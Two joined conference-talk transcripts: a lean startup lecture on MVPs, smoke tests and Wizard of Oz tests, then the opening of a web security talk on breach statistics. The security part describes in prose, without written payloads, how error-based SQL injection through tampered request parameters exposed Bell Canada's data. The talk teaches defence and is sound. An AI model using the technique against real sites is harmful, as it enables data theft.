to take to get into law school like GMAT or GRE in the United States. So what do you think this company does? Shout it out. Huh? It's a mailing list. Well, why would you sign up for this? What is the value proposition of this? Great. What do you think the thing is that you're signing up for? No idea. A study guide. A study guide. Games, yeah. Studying but more fun. This is a very simple page, right? How long would it take you to build this? An hour, 10 minutes? And this is a real company. This is Grocket. This was the first version of their product. And it is just a landing page. There's no functionality behind this. This is their last version. And you can see in the upper right there, it's been acquired for a very large sum of money. The entrepreneur in charge of this is well onto his next product. And notice something else about this. This is their latest version of the product. The home page, the functionality is basically identical. Sign up. They created this page just to see if anybody was interested at all. There was no functionality behind this. This was just created to see if it was even worth building the product. This is, of course, very common nowadays. Here's another one. This is called data shelves. This was their MVP. This is a little bit more value-delivering. What does this one do? What does this company offer? Let's take a random guess. Market statistics. What do you think happens when you sign up? They get your email. That is correct. But the next page is a pricing page. They ask you a simple question on the next page. Would you like your answer to your market research question? In seven days, give us $25. In three days, give us $50. Or in seven days, give us $100. And this company had a vision of a machine learning algorithm which would go through the web and pull out only the information that you wanted, kind of like Wolfram Alpha nowadays. But this was a while back. And then you select your pricing plan, you pay, and what happens? What do you think happens? Yeah, we'll get back to you, but you actually get an answer 24 hours later if you pay $100. How do you think they do that? Exactly. Okay, manually. There's an intern sitting there googling stuff. Okay, that's their machine learning algorithm. That's it. It's called a Wizard of Oz test. And this is quite common. There was another company called Ardvark that did the exact same thing. It was two Google engineers that left Google, decided to compete with Google by building a search engine basically powered by human beings. Their idea was that there are some questions which can't be answered by Google. What's the best lobster in Maine? But if I could ask people from Maine, they'd be able to tell me. So this idea depends on a very large network effect, right? If I don't have anybody in Maine in my network on the website, then I can't answer this question. So they hacked it, same way. They had three interns sitting there googling what's the best lobster in Maine? And then they'd fake the answer until more and more people signed up. They were, of course, I think one and a half or two years later, they were reacquired by Google. And I believe they made at least like $5 million each for those two years. So not bad for something mostly powered by humans at the beginning. And this is happening again and again and again. My favorite application, do you guys know Card Munch? Does that still exist here? No? Card Munch? Card Munch is an application which allows you to take a photo of business cards and will be automatically imported into your dress book, also powered by Mechanical Turk. Wonderful idea. There's another one, Click and Grow. This is an Estonian company. And as you can see, they tried to raise $75,000 on Kickstarter for a product that did not exist yet. And they raised $625,000, funded their entire development effort. This was the second Kickstarter they did. These are all essentially smoke tests. They're a way of establishing demand before the product actually exists. The Wizard of Oz test actually determines if we're providing the right value. We can actually see whether or not the user really engages with our product, because ultimately the user doesn't really care if it's a machine learning algorithm or a human being at the back end. They care about the result. I don't really understand how my computer works. I don't know what Chip said is in there, and I don't really care. It could be little elves. That's totally irrelevant as to whether or not I get the value that I'm looking for. Here's another one. This is another page that takes, you know, a day to create. By the way, all of these prototypes obviously take very little time to create, with the possible exception of the last one, right? This has a video. It takes maybe a few days to create. Then there's this. Anybody want to tell me what this company is? What do you think this product does? What's the value proposition here? Everybody's staring blankly. Playlist. So yeah, most people say music. They actually had three different versions of this landing page with, like, different girls, different guys, all of them wearing headphones. It has nothing to do with music at all. It's a social news aggregator. This is what I would call a terrible MVP. This MVP sucks. I would agree with your previous assessment. This is just a mailing list. This is a way of harvesting email addresses. This is what happens when lean startup goes bad. When we just accept the buzzword and kind of, oh yeah, let's do a landing page test. That'll help us. We'll get early people to sign up to our product. But people signing up to this page have no interest in a social news aggregator. The fact that they were able to optimize through rapid A-B testing, a conversion rate of over 30% to this page, just by putting a good picture up, tells us nothing about the value proposition of that business. It's utterly useless. The only usefulness is, as you said, if they sell these email addresses. And in fact, this company shut down. They spent about six months building this social news aggregator and then determined that nobody actually wanted it, which is a pity because they're actually quite brilliant guys. They want on to do some other cool things, though. And this does not exist only in the realm of hardware. We have 3D printers now. We're able to rapidly develop hardware electronics. There's a gentleman in San Francisco who has a 3D printer for circuit boards now. Very clever guy. Built that entire thing from scratch. So we have products like this. Anybody know this product? You're familiar with anybody? Apple One. Brilliant MVP. From the company that never puts out anything less than perfect, their original product was a wonderful, wonderful, wonderful MVP. Tested market demand for something. Now I'll tell you the one that to me is the most embarrassing from my perspective. There was a guy in Manchester, England named Amon. And a very ambitious guy, young guy, was just, I believe he was about 21, just getting out of college. He had 1,000 British pounds to his name, just 1,000. And he said, I'm going to start a business. And he did what most business people in this case would do. He would go to you guys and say, will you please help me build my product? My product is a two-sided marketplace. What I want to do is I want to connect musicians to content producers, people who have videos, people who have logs, so that they can add the music to their blog or content and hopefully generate more money. That was his business idea. Two-sided market. And of course, you would say something like, who here gets pitched business ideas all the time? What do you say to this? Huge network effect to overcome. Who else? Somebody there raised their hand. What do you say? You want to join my startup and do this? Yeah, that's pretty much the answer most people would give. It depends on the network. Who else raised their hand? I have a better idea. Excellent answer. Why on earth? You don't have any technical skills. You can't build anything. What do you add to this equation? Half of the people here said they were going to do a startup. We all have better ideas. What's there to prove that this person's idea is better than ours? So his response, of course, was fuck you, I'm going to do it anyway. And he had a lot of, let's say, chutzpah. He had a lot of willpower to do this. So what he did is he took the unorthodox step of creating a website to help relax your dog. So you have a very small dog. It's very annoying. I will create a website that will help you calm that dog down. Anybody want to invest in this idea? No? With his 1,000 pounds, he hired some musicians that he knew and created a soundtrack. And he took a video of his small dog or somebody else's small dog, I don't know whose dog it was, listening to the music and going to sleep. And he put this video up on YouTube and he said, people would watch the video and at the end of the video it says, if you have this problem, if you have a dog that won't shut up, you can pay me $20 for the whole album. I'll send it to you. Or you can post a video of your dog calming down to this and link back to me. And of course, the video goes up like this, up and to the right. He winds up with 2,700,000 views of that video. He throws up a WordPress site. I think this is WordPress. Not very sophisticated. And you can tell his wonderful design skills here. Kind of blindingly purple. But I guess it is soothing. And he puts up relaxmydog.com. When I met him, he was making 5,000 British pounds a month. Again, student. $1,000 investment. No engineering talent whatsoever. Making 5,000 British pounds a month. Just from this. And he puts up another couple long tail sites. His idea was, well, I want to create this two-sided network to help content producers make money from adding music to their content. If they can't make money by adding music in some way, well, then this is a terrible idea. So I'm going to prove that content producers can make money off of music by just doing that. I'm going to try and make money off of random music that I can hire out for. It's a little bit of a strange MVP. It's a very micro niche, clearly. But he put this up and was making 5,000 British pounds a month. He starts putting up other long tail content sites using content that he's outsourcing ostensibly. Six months later, he's making 25,000 British pounds a month, which is not a bad salary. He couldn't get any venture capital investment, couldn't get a technical co-founder. After this, he's got VCs coming to him and he says, go away. I don't need your money. I have no use for it. I have revenue. He has a technical co-founder now and he was applying to 500 startups, I think. But I don't think he even needs to go in. He's got a perfectly valid business model so far and he can take the next step of trying to actually automate that process. Can he put up sequentially many, many long tail sites? In fact, I know somebody who does this with applications, they just throw up generic content from the web and prepackage it into Android apps and have an automated build system that essentially lets them completely spam the app store, the Google app store or Google Play, whatever it's called. So this is not an atypical thing to do. We're being killed by business guys who are willing to just hack something together really quickly that has just enough value, just enough to make people happy, just enough to deliver some element of value that somebody are willing to pay for or exchange data for. And most of the applications we see out there are not incredibly sophisticated. They're incredibly niche. This sort of thing is becoming more and more popular. There is another company I know down in Mexico. They had another idea, actually a great team of engineers. They wanted to connect musicians with venues and music promoters in Mexico. And the problem they understood from the venues was that the venues didn't know which bands would be popular or not. So if you have a band from Oslo and they want to come over to Mexico, the venue says no. I have no idea who you are. I don't know if the music will be compatible with the local culture here. Their idea was, well, we can take that music from Oslo and we'll do some blind tests. Forget about marketing. We're not going to market the band. That's too expensive. What we're going to do is we're just going to try and test out whether the market likes this or not before investing a lot of money in marketing. So if this was your project, what would you do? How would you test this? How would you try and establish whether a band from Oslo will do well in Mexico? Take a random guess. There's no wrong answer. What? Play the music. To who? To Mexico. To Mexico. In clubs? That's good. That would be one way. We could just put it up and see if anybody dances. If you've got the right music. Any other ideas? How would you say to look at YouTube videos? Targeted ads to a YouTube video. See how many likes it gets. I think that's good. The one problem there is that it's, as far as I know, it's difficult to see page views on YouTube. So we don't have the denominator that we need to see a conversion rate. In the club, actually, we can see how many people are in the room. So we could, in theory, see that. But a little bit more difficult. One of the most creative ways I heard to test this was somebody suggested actually putting speakers on top of a car and driving down the street with a big phone number on the side that says, if you want us to go away, text this number. If you'd like us to stick around and bring this band here, text this number, which I thought was brilliant. I would love to see that happen. Probably they'd get arrested, but it would certainly be fun. So this company, they can actually, good engineer in this company, it's certainly easy to build something. They decided they did want to build something. They wanted to build a website where essentially you would go and listen to a clip of this music and say, yes, I like this, no, I don't like this. It would be blind, so like Coke versus Pepsi taste test. And you just get an honest reaction as to whether or not the music was good or bad without any marketing jargon or blasting skewing your results. And they could build this. It's pretty simple to build. You don't need a huge amount of music library. You don't need access to iTunes or anything like that. You don't need to make any record deals. You can just pulse your music for independent artists. But they decided to test their actual website. And this was their prototype. Piece of paper. It's actually two pieces of paper. Sorry, my bad. It's one piece of paper sitting on top of another piece of paper. That actually turns out to be great because you can change the interface really quickly. They went to coffee shops and they said, hey, man, we've got this idea where entrepreneurs, I see your coffee is running low. We'll buy you a cup of coffee if you can check out this prototype and see how it works. A person would generally say, yes, why not? I'm sitting in a coffee shop. I'm enjoying my coffee. I like to help out young entrepreneurs. I'll play with your prototype. And what they wanted to see was, will somebody listen to just one or two songs and then say, this is not interesting? Or will they get enough engagement on their prototype so that it justifies actually building something? And so they put this in front of people and they said, treat this as an iPad. It's just an iPad. If you want to click a button, just press the button. And I'm going to give you my headphones. And when they hit play, I hit play. And they discovered some very interesting things. They discovered, OK, first of all, people were willing to do that, but that's probably a false positive bias because you're there asking them to. But they also discovered that people, they thought their big concern was that, well, if people need to listen to a minute of music and we need to get them to, you know, we're going to need people to rank at least five or 10 songs, otherwise we're not going to get enough data. Like, this is a big data play, essentially. We need people to listen to a lot of different songs and tell us what they like and not like. Otherwise, we're going to have to recruit so many people to listen to songs that this is unfeasible. So we needed a massive amount of engagement. And they thought that they weren't sure that if people were willing to listen to a minute of this band, a minute of this band, a minute of this band, they found out with this prototype that people immediately started hitting the next button within three seconds if they didn't like the music. If they liked the music, more like 10 seconds. Like, that's it. That's how long it took people to figure out if they liked or didn't like the music. And people loved doing this. They were sitting there for longer than five minutes. They kept pressing it through. They were like, this is really cool. I like this. This is awesome. What's this band? People would pick a band and they'd put another piece of paper there and so, oh, this is what happens. This is what happens. This is what happens. And that person would leave with a list of new music that they liked. And this was their prototype. And then once they'd established the basic user behavior, they're like, okay, but maybe we're just fooling ourselves. Let's actually build the website and see if that user behavior still holds. And they built a prototype, a real prototype, a working thing. They built this. And how long does this take to build? As your engineers, how long? I mean, clearly the design took a few months, but how long? An hour. Yeah, maybe something like that. Certainly less than a day. And it has all the basic functionality that one would expect. And if you're thinking to yourself while you're trying to do that mental calculation, if you were thinking longer than an hour, remember, you don't need a big database of songs. You can just hard code one or two songs in there, or five or 10 later. No need to have a massive library. You can do this entire site with just JavaScript, I think. JavaScript and all the HTML. I think they built it in Rails, but, you know. And then they did their next version and their next version. And these builds are taking days. Days are hours, not weeks, not months. And it's slowly evolving. And the behavior they're finding on this website is almost identical to the behavior on their paper prototype. Almost identical. They're getting the same level of engagement, which is fantastic. They're not spending much money. They're just sharing this with friends, or sharing it with their friends, or sharing it with their friends. They're not seeing quite the engagement they want, but they're getting enough to validate their initial assumption and continue building. And they keep building, and yes, things are broken and images aren't showing up, but that's okay. They keep evolving and iterating the design, and they get something that's actually starting to look quite fancy. And they wind up with something like this. What do you guys think of this version? Better design or worse design? Better. Better. Huh? Starting to get bloated. Starting to get bloated. That would be my guess as well. This version actually behaves worse than the previous versions. It is too bloated. The design is too cluttered. I'm not sure what I should do on this page. Their last version? It's pretty clear what you should do on this page. The bounce rate on this page, very, very low. It's only one thing you should do. You understand what it is. And the thing is, if they'd done, if they'd just built this site from the get-go, you know, you could argue they should have just built this site. But if they'd built this site, they would have found their engagement numbers low, and this idea is bad. Don't bother. But the simple version wins. Now, certainly, that's not the case in all industries. You don't want an MVP of a cure for cancer or a malaria vaccine. That's not a good idea. For most things, this works very, very well. A nice, targeted, clear value proposition that's easily understood by the user and that produces value. There was another story that Eric Rees told me, which I thought was wonderful. He was the CTO or VP of engineering or whatever title they want to assign themselves at a company called InView. Anybody know InView? Anybody ever used InView? No? Not my sort of site either. It's like a virtual world chat. So I'll create a virtual avatar, you'll create a virtual avatar, and my virtual avatar will go over and chat with your virtual avatar. I don't really understand why anybody would want to do that, but people apparently do in droves. And they had to implement these avatars moving around, obviously. If I want to go and talk to your avatar, well, we have to calculate, of course, how my avatar goes around the podium and gets to you to talk to you or you or you. And that's non-trivial, right? You can do it, but it will take a little while. And in the prioritization of their agile development process, they were like, let's just put it out broken and we'll fix that next week. We'll just make it so that if I click over here, poof, your avatar magically appears over here. And we know that we'll get complaints and a lot of user feedback, but that's OK, we'll fix it later. We're an early-stage startup if we lose a few customers, not a big deal. And something very interesting happens. They do start getting comments from customers. And the comments from customers are, this is awesome. Just awesome. Your avatars are more technologically sophisticated than all the other avatars in virtual worlds. Technology superior technology. Why? Why do you think they're technologically superior to all other avatars? What? They're faster. Yeah, they can teleport. Your avatars can teleport. All the other avatars have to walk from place to place. That's what the user thought. And I mean, that's true, right? If you could teleport, why would you ever bother walking? I like to walk in the park. It's very lovely here in Oslo, except maybe today. But I would teleport back to San Francisco, grab a sandwich, and come back in a second. So they stumbled upon actually a simpler solution technologically, saved them a lot of time, and it was actually proved to be a great value proposition to the customer by choosing what not to build. So this is kind of the experimentation approach. So Lean startup, since again, I would normally skip this, but I think it's worth restating. So the Lean startup approach, there are a lot of methodologies, but Lean startup is a principled approach as far as I'm concerned. It has nothing to do with filling out a business model canvas or a Lean canvas or you have to do a smoke test. That is all nonsense. Just like if you wanted to do agile, you don't have to do scrum. It is not required. Doing a daily stand up does not make you agile. Companies that adopt scrum and just think, well, we're all doing stand ups, that means we're agile. That's ridiculous. That's just ridiculous. If it's a small team and we all know what we're doing, we don't even need to do a daily stand up. We're all sitting right next to each other. It's not required. So Lean startup is getting to be like that. There's a confusion between methodologies and principles. And if you read the original agile manifesto, like the one that's actually signed by Kent Beck and all that sort of thing, that's really the principle of Lean. It's about producing value for customers, creating customers, creating customer value, not just capturing value, but creating it. How can we build something that actually has value for customers? As far as I'm concerned, it starts with only three principles. Three principles to Lean. Number one, I don't know. You have to start by saying, I don't know. If you think you know everything, if you think you know exactly what features you need to build, if you think you know how to build it and you think you know how the customer is going to react and you think you know how much they're going to pay you, don't do this. This is a waste of your time. You don't have to do Lean startup. You can go and build something for a year. Like, I don't care. If you have the money and you have the time, wonderful. Like, go for it. I like to build things. It's enjoyable. I learn new tips, tricks, languages. That's fun. That's great. But that's not building a business. To build a business, you have to start with the idea of, I don't know. And only when you can start with that level of humility can you actually choose to learn something. If you think you know everything, you will never learn anything. Second principle is perspective. You need to get perspective on your ideas. And I don't even care. This is actually kind of an informal rule of Lean startup as far as I'm concerned. Perspective from customers. Perspective from your friends. Your friends can tell you where your blind spots are. You cannot. You can never see your own blind spots. When you lose your glasses, where are they? Don't know? Yeah, of course. You can't see. When you lose your glasses, where are they? Seriously. You never lose them. Good for you. When I lose my glasses, they're generally either on top of my head or worse, I'm actually wearing them. Which is something that's very foolish when somebody points that out to me. So we're not aware of our own blind spots. It's hard to see past our own perspectives. Having somebody else to bounce ideas off of and not defend our business idea and not defend it, we're not trying to win the argument. We're just trying to get perspective. Somebody asks you, I don't understand. Who's your customer? Or what's your value proposition? We shouldn't take that as an affront. We should take that as, maybe it's not clear. Maybe I don't understand my customer. Maybe I need to research that. Maybe I need to go talk to human beings and discover what they actually want. So get perspective. It also means qualitative versus quantitative data. If you have quantitative data, that's awesome. Quantitative data rules. But if you don't know why people are clicking the button, then it doesn't help you. You need qualitative data and quantitative data. If you've got quant, go for qual. If you've got qual, go for quant. So perspective rules, getting as many data points and as many experiments to validate your assumptions as possible, that tells you you're doing something. And the last thing is, of course, the bumper sticker, build, measure, learn. But the important thing, again, to remember about this is it's not about build, measure, learn. It's about the speed at which you can go through this cycle. You have to go through this cycle as fast as possible. And the other corollary to this is it's not build, measure, learn. This loop is actually backwards. It's written twice in the Lean Startup book if you choose to read it. But this loop is completely backwards. If you want to learn something, you don't start by build something randomly and throwing it against the wall and see what works. That's called spaghetti testing. Throw it against the wall and see what sticks. We like to go backwards. We like to figure out, what do we want to learn? What's our hypothesis? How are we going to measure that? What information would actually change our mind? What information would tell us that this idea is terrible? We shouldn't do this. If you can identify what data would convince you that this is a bad idea and you should stop what you're doing and go back and get a job, now you're on to something. Now you can go and build an experiment to gather that data. So this has to go backwards before it can go forwards. You've got to create a hypothesis metric experiment. And then we can talk about build, measure, learn. I got stuck. So I'm swiftly running out of time. We can talk about this, but it's not really that critical right now. Lean startup is being adopted, again, all over the world in places like Ramallah and Saudi Arabia and Palestine, China and Beijing. Everybody's kind of on a different loop of adoption here. Anybody know this shape? Gardener hype cycle, correct. All technology tends to go through this where we get really excited about Node.js and then we realize Node.js is crap and then we realize that, oh, wait, you can do some really cool things with Node.js. Lean startup is kind of the same way. From what I've seen so far in Norway, we're very much in the buzzword like, of course, if you're not building an MVP, you're doing something stupid. It'll probably get worse before it gets better, at least in Silicon Valley. I'm so sick of people saying that they're pivoting. That's just a nightmare. It's like, oh, I had an idea this morning. Then over lunch, I thought about and I pivoted. I pivoted my business idea twice today. That's some sort of badge of honor. I pivoted twice. You didn't pivot, you changed your mind. Changing your mind is not pivoting. Pivoting means you learned something from the customer and you adapted your business model based on that information. It doesn't mean you just changed your mind or had a bad day and thought it was silly and threw it away and started a completely different business. That's just ridiculous. Very much in Silicon Valley, we've got levels of hype there, but the real Lean startup stuff happens when you start practicing. It happens when you build MVP after MVP after MVP after MVP. You cannot expect that you're going to build a successful business the first time out. In fact, in Silicon Valley, if you haven't failed at least once, they would consider you kind of not serious about entrepreneurship. When I moved back to Silicon Valley five years ago and I started a business, how many letters do you think I got congratulating me for quitting my job and starting a business? How many? Huh? 500. You're 500 off. Exactly, 1,000. No. Zero. Nobody could. I mean, it was also the middle of the financial crisis, right? So people thought I was crazy. In fact, I was crazy. It was a terrible idea. But nobody congratulated me on starting that business. However, when I shut that business down six months later and posted a blog post where I proudly announced this is why we're shutting down, we learned this, we ran these experiments and this is a bad idea. Don't do this idea. Or if you do this idea, learn from what we did. And I got congratulation letters for years afterwards. People still come to that blog post and they're like, oh, this is awesome. Would you mind if I'm interested in this area? Can I pick your brain for half an hour for coffee? People still do that. It's a very vibrant culture of accepting of failure. That's something that is very, it's tough to develop in an ecosystem, in an innovation ecosystem, but it's very important and valid. It's necessary. You have to be willing to stand up and say, you know what, I tried this and it didn't work. But I'm willing to try again. That's kind of the painful part about this. Exactly. It's traumatic, especially in a lot of other cultures in Mexico and Japan, particularly like, oh, if you failed as an entrepreneur, you're going to have a tough time getting rehired. But it's changing. If you're hanging out with people who don't accept the fact that you're going to quit your job and do a startup for a year, and that's okay, and if it doesn't work, oh well. You're hanging out with the wrong people. Doing a startup kind of sucks. Most of the time you're going to fail. In fact, most of the experiments you're going to run, most of the experiments you're going to run, they should fail. If all the experiments you run succeed, you're learning nothing. You're just validating your own, oh, I was right every time. It means the experiments you're running are not very risky. If you fail all the time, you're also learning nothing. You're just clearly, I don't know what you're doing. You probably just installed your Google Analytics wrong. That's probably the answer. About half of your experiments should fail. Half of them succeed. That means you're making progress. And of course, the other thing I hear in many ecosystems is like, oh yeah, well that wouldn't work here because we're Norwegian. We're Swedish. We're Mexican. It won't work for my idea because it's a two-sided market because there's a network effect. It's all bullshit. Every single time people say, oh, I could never go out and talk to customers because people in our society don't accept it when you approach them on the street. It's nonsense. Every single time we do this, we challenge people to go out and talk to customers. It works in Switzerland. It works in Ramallah. It works in Beijing. It's not a problem. And I guess the last thing I'll quickly note, the other objection I hear is, of course, the corporate objection. Oh, we do lean startup. We do agile development. We iterate very quickly. We do that. That's called, my friend David has a name for that. He calls it water scrum fall. Right? So when the designers are iterating very quickly and then they hand it off to the engineering department that iterates very quickly and then hands it off to the marketing department that iterates very quickly, the entire thing is still taking one year to build, but hey, we're all doing agile. Right? Like, that's working fine. Like, this is a very typical scenario. This is not lean startup. This just leads to death, death of the product. Not very useful. So you have a choice. You don't have to do lean startup. You don't have to listen to any of this. You don't have to do smoke tests. Nothing like that. You have a choice is to say whether or not you want to learn quickly or whether or not you think your idea is perfect and there's nothing to learn and it will emerge fully formed from your brain like Athena from Zeus's head. Like that's fine. You have a choice. This sort of thing is hard. Doing startups is hard. I mean, doing a startup essentially is going through the repeated pattern of getting excited about something, trying something and see it utterly fail and getting depressed. If you haven't started, if you're doing a startup and you haven't wept yet, like openly wept in your room late at night going this was the dumbest idea of my life, I should have never done this. You're probably not doing it right. Like it sucks. And lean startup is even worse. Lean startup is saying not only do I want you to try something, put all your effort, put all your dreams into it and then watch it fail, but I want you to do that repeatedly. I want you to do that repeatedly every night. I don't know about you guys, but if I go to the bar and I try and like I see my dream and I try and approach my dream and my dream says no, go away. Like that's bad for me. I can maybe do that maybe one or two times a night and then it's time to head home. I'm sorry guys, I'm done for the evening. It's the same process. And now you want to tell me I should do this 200 times a night? This is horrible. It is a traumatic experience. The only way you can survive this experience is by changing your definition of done. Your definition of done is not I wrote code. It's not even I got customers. I made progress because I learned something today. I learned something in this startup that I can take to my next startup. I learned a skill today. This is a skill. Creating a business is a skill. Running experiments is a skill that scientists take years to perfect. Figuring out how to do the perfect control group. You have to do it over and over and over again. And if you can change your perspective from I finished like TDD, I'm done. My test passes. Or BDD. I wrote my cucumber spec and it passes to hypothesis-driven development. I had an idea. I tested it. It worked. It didn't work. But I learned something either way. So if we can change our definition of success from I finished coding to I actually learned something that will help me in the future, like that's success. And that's what Lean startup is about. So that's all I got. I'm happy to answer questions from you guys. I'm happy to do a dance. No, I'm not happy to do a dance. Sorry. Scratch that. Anybody have any questions about this? We have like five minutes for questions or should we call it? Yeah? I'm actually really hungry. So if your question is when is lunch, I'm perfectly happy to answer that by saying now. No? With the landing page test. So the question is with a landing page test, are you testing your marketing mechanism rather than the idea itself? And the answer is yes. But that's kind of the point. If I can build an amazing product but I have no way of getting that to the customer, so what? I mean, for years Bill Gates is working on this problem radically. We have wonderful vaccines. We know vaccines work. But we still have cases of smallpox polio, actually probably not smallpox at this point. But polio is making a resurgence. Why is that? We have no delivery mechanism. We can't get these vaccines to the places they're actually needed because they get too warm in transit and they expire. And they're useless. The delivery mechanism in that case, the distribution channel, not even the marketing channel is the critical thing. We need to look at our business and establish what's the risky part of it and do that. And if you have no way to get to market, that's a pretty risky hypothesis. You really ought to test that. So yes, you are. In fact, one of the things I prefer to do is when you're doing a smoke test, you split it into two tests. You do what I call a comprehension test and then you test whether or not people will click through on the value. Because if people can't understand the value proposition, then the conversion rate on your landing page is meaningless. So if I say I've got a landing page, this landing page will cure plantar fasciitis. How many people know what plantar fasciitis is? One, two. And so for the rest of you, I have a website. If you have foot pain, particularly in the morning, this will cure that. Everybody understand that? Yes, OK. So we have to talk in language that the customer understands that's the idea of a comprehension test and can be done very simply just by saying somebody, here's my value proposition, please explain it back to me. Very, very simple. What was the other question? No, that's OK. I was just wondering if there's really no one who can do that. Yes. Well, sorry. OK, one person did, but that's my mom and it really doesn't count. Question. OK, you do lean for mission-critical systems. So lean for mission-critical systems. So definitely not my area of expertise. There's actually somebody giving a workshop Thursday, Mary Poppendijk, who's particularly good at this. I mean, if you know the value that you're trying to build, lean is not the most appropriate thing, right? For mission-critical systems where you really know exactly what you need to build, agile is probably the approach you're going for. So the thing about lean is you can think about it like we don't know that it's mission-critical. Like, all right, now we should test marketing and test the business model canvas and test all of that thing. So there are ways to break down something like concurrent set development is a wonderful way of doing mission-critical development. The US Navy developed the Polaris submarine using concurrent set development. When the Russians back in, I guess this was the 70s, early 70s maybe, they launched a submarine that could actually launch its nuclear weapons underwater so it avoids the risk of being of that vulnerable point where the submarine's on top of the water and can be attacked. The Russians launched that surprisingly and the US plan was an eight-year plan to develop that thing. They were like, uh-oh, big problem, particularly in the middle of the Cold War. They used concurrent set development. They broke it into three teams and said to one team, you guys go off, strip this down to the minimal feature set and build that. You guys go off, take that entire eight-year plan and do it in one year. I want all of it done in one year. And you guys in the middle, you take kind of a middle feature set. And then all those teams, day to day, week to week, they exchanged learnings and knowledge. They started to understand like, well, if we take this engine type, we're going to encounter these problems. You guys who are trying to do the whole thing, like, oh, wait, if we do this engine type, we're going to encounter different problems. And we do things like we try and delay decisions until the last possible moment. We'll try and delay the decision of what engine type until we see three people trying three completely different engine systems to resolve the issues of their feature set and then plug in the engine that makes the most sense and exchange that knowledge across the face. Again, this is not my area of expertise. Mary Poppendeeke has a wonderful book called Lean Engineering, I think, that she talks a lot about concurrent set development. So I think that's a very good one to read if you're interested in that. But the mission critical part of your business as a startup is does anybody want my product all the time? Other questions? Okay. Then I thank you very much. I wish you a very good lunch. And I wish you would all quit your jobs into a startup. Sorry. Everybody. Okay. Sorry. Everybody.
Lean Startup has given us a lot of new buzzwords. What is it doing to change the way we work? Are we just building more junk faster? We will go through real examples of a well executed lean startup and some typical pitfalls in order to point out the differences with those playing buzzword bingo and those who are really building something meaningful in a lean fashion.
10.5446/50647 (DOI)
All right, welcome everybody. Sorry about our little technical dramas there. You're losing about 10 pixels of my right hand side, but that's going to matter. So hello, everybody. My name is Troy Hunt. I'm from Australia. I'm going to talk more about Australia on Friday. I've got another session on Friday that's going to go into a lot of detail about some attacks. We're going to break some stuff on Friday. But today I want to talk about a bunch of attacks that we've seen in the past, how they've worked, and what we can learn from them, what we can do differently in future. And where I like to try and start these talks is to take a little bit of a look at why it is that we're bothering to talk about web security. So I have this slide where I put a whole bunch of company logos on. And every time I do this talk, the logos have to get smaller and smaller and smaller because there's so many more of them. So I've got things like eBay from a couple of weeks ago. Didn't have that last time I did this. So it's an ever-expanding list. And what I find really interesting about this list is the diversity of organizations that are represented. So we're seeing everything from shopping centers to telco to military contractors like Lockheed Martin. I'm not sure what things like prong.com are, but there's a really broad range of websites that are represented. So it's not discriminatory in terms of who's getting attacked. Also not discriminatory in terms of why people are getting attacked. If it's on the internet, it's pretty much fair game. So before I jump into the actual attacks themselves, one thing that I think is quite interesting is the way attacks are changing in terms of scale and volume. And one of the things that I find really stark is this graph here about attacks over time. So this goes from about April 2010 through to about the middle of last year. And I picked this range because I did a course on this recently for PluralSight in terms of the changes between versions of the OWASP top 10. Is anyone here familiar with OWASP? Just show of hands. And it's maybe a third, not too bad. So just a quick diversion. OWASP is the Open Web Application Security Project. And they're not for profit organization. And they create a bunch of material to help us build safer websites. And one of the things they create is a document called the Top 10 Web Application Security Risks. And it talks about things like SQL injection and cross-site scripting, how they're executed, how to protect yourself against them, and how to do it in different languages as well. So a lot of the stuff that I talk about and write and create material on is around OWASP. So I'm going to come back to them a few times. So anyway, this was the difference between web security in the OWASP 2010 version and the OWASP 2013. And what I was trying to show is just how much the attacks are increasing. So up until about the middle of that graph, we're under about 100 different attacks a month. We get through it at the last half and now we're up around that 250 plus mark. So we're seeing a lot more. This data is from datalossdb.org. It's a great site for listing breaches that have occurred and it explains who did it and how they happened. It also only explains the ones we know. So there's 6,000 breaches there that they've recorded that we know of. There's a hell of a lot more that we don't know of. Now one of the other interesting things beyond just the volume in terms of the number of breaches is the amount of data that gets disclosed and compromised in each one of those breaches. So what we're seeing here is that the records that attackers are getting their hands on are increasing dramatically. 822 million records last year, nearly doubling previous hype. So that's really significant. We're getting towards a billion records there in 2013 alone. So I think it's some of the big ones. 2013, everyone probably heard Adobe got attacked. 152 million accounts from Adobe alone. Most people know Target had huge issues. 110 million credit cards in 2013, in about December. And already this year we got eBay. So eBay says we've had 145 million active users compromised. But I don't tell you how many inactive users. I don't know how many it is, maybe 300 million. It's a lot, significantly higher than 145. So we might find that 2014 is the bumper year in terms of data breaches. So last thing before we get into some of the attacks. And this sort of looks at what were the top 10 breaches in terms of the records that were compromised and when did they happen? And there's an interesting little pattern here. When you have a look at the dates, five of the top seven were in the last 10 months. So that's massive. This is tracking stuff that goes all the way back to the 80s. But five of those top seven attacks happened since August last year. So we've got this problem where they're getting more and more and more attacks and they're getting bigger. Each one is getting bigger. And again, 145 million from eBay, plus all the other ones I don't tell us about. All right, so let's jump in. We're gonna look at 10 different attacks that have happened over recent years, happened online, and we're gonna look at how they happened and what we can do to stop them from happening again. So the first one, pretty simple run of the mill SQL injections. This is Bell in Canada. This is a telco in Canada. Earlier this year, they got popped by a SQL injection attack. And what ended up happening was about 22,000 records that were compromised, no cryptography at all on passwords, no encryption, no hashing. Very important difference between those two as well that we'll talk about on Friday. Now, so we've got 22,000 records, they all get exposed and because it's a hacktivist, what a hacktivist do? They whack it all on paste bin. And of course, this is terrible for a company because not only did they get hacked, but now all their users credentials are somewhere public. Now we know it was SQL injection because the attackers told it was SQL injection. They posted a really nice screen grab. The thing about hacktivists, they love telling you how they did it because it's so intelligent, it's so clever. Look at what I did. This is a free plugin to Firefox called Hackbar. And what Hackbar lets you do is do a little bit of fuzzing on HTTP request. So what I mean by that is that you go to a website, you make a legitimate request. So this is a password recovery page. It was making a post request which inevitably has something like the email address you want to recover the password for. I really hope they didn't actually just email the password but I reckon they probably did because they're all in plain text anyway. So anyway, you make the request and then you use Hackbar to capture that request, manipulate some of the parameters and see if you can get the web application to actually throw some exceptions. Now in this case, we can see down below it is actually throwing an exception, Microsoft OLEDB provider. And it's giving a conversion failure where what's actually happened is the attackers have tried to get the version of the SQL server. And we can see it is Microsoft SQL server 2008 R2, blah, blah, blah, blah, blah, blah, blah, blah, blah, and cast it to an integer. Now it's a string, why it cast to an integer? It's got lots of letters and things that really aren't conducive to integer. So SQL servers thrown an exception and the exception is bubbled up into the web browser and disclose the fact that this is what the database is. That doesn't sound too bad, but that technique is then used to get the table names and the column names and the data. And if that sounds hard, on Friday, I'll show you how any of you can do it with your own websites. Very, very simple. So there's a few things that we can take away from this attack. And the first thing is SQL injection is the number one attack on the web. And it's a number one attack for a few different key reasons. Number one is it is really, really prevalent. There is so much SQL 